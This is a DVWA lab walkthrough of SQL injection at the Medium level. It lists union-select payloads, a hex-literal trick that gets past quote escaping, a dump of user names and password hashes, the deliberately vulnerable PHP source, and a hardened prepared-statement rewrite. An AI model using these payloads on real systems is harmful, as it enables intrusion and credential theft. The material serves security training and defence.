DVWA -- SQL Injection -- Medium


Contents

Level: Medium

1. Inspect the POST request
2. Submit the POST request with HackBar
3. Enter ', observe the error, conclude numeric injection
4. Guess the number of columns in the SQL query
5. Determine the echo positions
6. Get the current database name and version
7. Get the table names in the database (group_concat())
8. Get the table columns
9. Get the user information
10. Decode the hashes

Back-end source


Level: Medium

The Medium-level code passes the input through mysqli_real_escape_string, which backslash-escapes the special characters \x00, \n, \r, \, ', " and \x1a, and the front-end page replaces the text field with a drop-down select form in the hope of controlling user input that way. Although the front end only offers a drop-down menu, we can still capture the request and modify its parameters, submitting a maliciously crafted query parameter. This is where the interception proxy Burp Suite and the proxy settings come in.

1. Inspect the POST request

2. Submit the POST request with HackBar

Switch to HackBar --> Load URL --> Post Data and enter id=3&Submit=Submit

3. Enter ', observe the error, conclude numeric injection

4. Guess the number of columns in the SQL query

From the results below, the SQL query returns 2 columns.

id=1 order by 2 &Submit=Submit        # query succeeds
id=1 order by 4 &Submit=Submit        # query fails
id=1 order by 3 &Submit=Submit        # query fails

5. Determine the echo positions

id=1 union select 1,2 &Submit=Submit

6. Get the current database name and version

id=1 and 1=2 union select database(),version() &Submit=Submit

7. Get the table names in the database (group_concat())

id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() &Submit=Submit

8. Get the table columns

Because single quotes are escaped, the escaping has to be bypassed; a hexadecimal string literal can be used for this.

String-to-hex converter: https://zixuephp.net/tool-str-hex.html

id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' &Submit=Submit

This errors because the single quote is escaped:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'users\'' at line 1
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 # &Submit=Submit

9. Get the user information

id=1 and 1=2 union select user,password from users # &Submit=Submit

10. Decode the hashes

Look the hashes up on CMD5.

Back-end source

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>
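As an added example (my own code, not DVWA's and not part of the original post), here is a hardened version of the Medium-level handler above. It keeps the page's `$GLOBALS["___mysqli_ston"]` connection handle, which I assume the surrounding DVWA page has already opened, and replaces the escape-and-interpolate pattern with integer validation plus a prepared statement. The reason escaping alone fails is visible in the source: `$id` is interpolated unquoted, and `mysqli_real_escape_string` only backslash-escapes the seven characters listed earlier, so a value like `1 union select 1,2` contains nothing to escape and reaches the query untouched. A bound parameter travels separately from the SQL text and cannot change the query's structure; `validate_user_id` is a helper name I introduce here.

```php
<?php
// Added example: hardened variant of the DVWA Medium-level handler.
// Assumes the surrounding DVWA page has already opened the mysqli
// connection in $GLOBALS["___mysqli_ston"], as the original source does.

/**
 * Validate that the submitted id is a positive integer.
 * Returns the int, or null for anything else. Inputs such as
 * "1 union select 1,2" or "1 and 1=2 union select ..." contain none of
 * \x00 \n \r \ ' " \x1a, so mysqli_real_escape_string would leave them
 * unchanged; type validation rejects them outright.
 */
function validate_user_id($raw): ?int
{
    if (!is_string($raw)) {
        return null; // arrays (id[]=1) and missing values are rejected too
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

if (isset($_POST['Submit'])) {
    $id = validate_user_id($_POST['id'] ?? null);
    if ($id === null) {
        http_response_code(400);
        echo '<pre>Invalid user id</pre>';
        exit;
    }

    $db = $GLOBALS["___mysqli_ston"];

    // The SQL text contains no user data; the value is sent as a bound parameter.
    $stmt = mysqli_prepare($db, 'SELECT first_name, last_name FROM users WHERE user_id = ?');
    if ($stmt === false) {
        // Log the driver error server-side instead of echoing it: the verbose
        // MariaDB error page in the original is what let the walkthrough
        // confirm column counts and quote handling.
        error_log('prepare failed: ' . mysqli_error($db));
        http_response_code(500);
        echo '<pre>Lookup failed</pre>';
        exit;
    }
    mysqli_stmt_bind_param($stmt, 'i', $id);
    if (!mysqli_stmt_execute($stmt)) {
        error_log('execute failed: ' . mysqli_stmt_error($stmt));
        mysqli_stmt_close($stmt);
        http_response_code(500);
        echo '<pre>Lookup failed</pre>';
        exit;
    }
    mysqli_stmt_bind_result($stmt, $first, $last);

    while (mysqli_stmt_fetch($stmt)) {
        // Escape on output as well, so stored names cannot inject HTML.
        echo '<pre>ID: ' . $id
           . '<br />First name: ' . htmlspecialchars($first, ENT_QUOTES, 'UTF-8')
           . '<br />Surname: ' . htmlspecialchars($last, ENT_QUOTES, 'UTF-8')
           . '</pre>';
    }
    mysqli_stmt_close($stmt);
}
?>
```

With this in place, every payload in the walkthrough above (`1 order by 2`, `1 union select 1,2`, `1 and 1=2 union select ...`) is refused by `validate_user_id` before any SQL is built, and even a value that did reach the database could only ever be compared as an integer against `user_id`. The hex-literal trick in step 8 is irrelevant here because there is no quoted string context left to break out of.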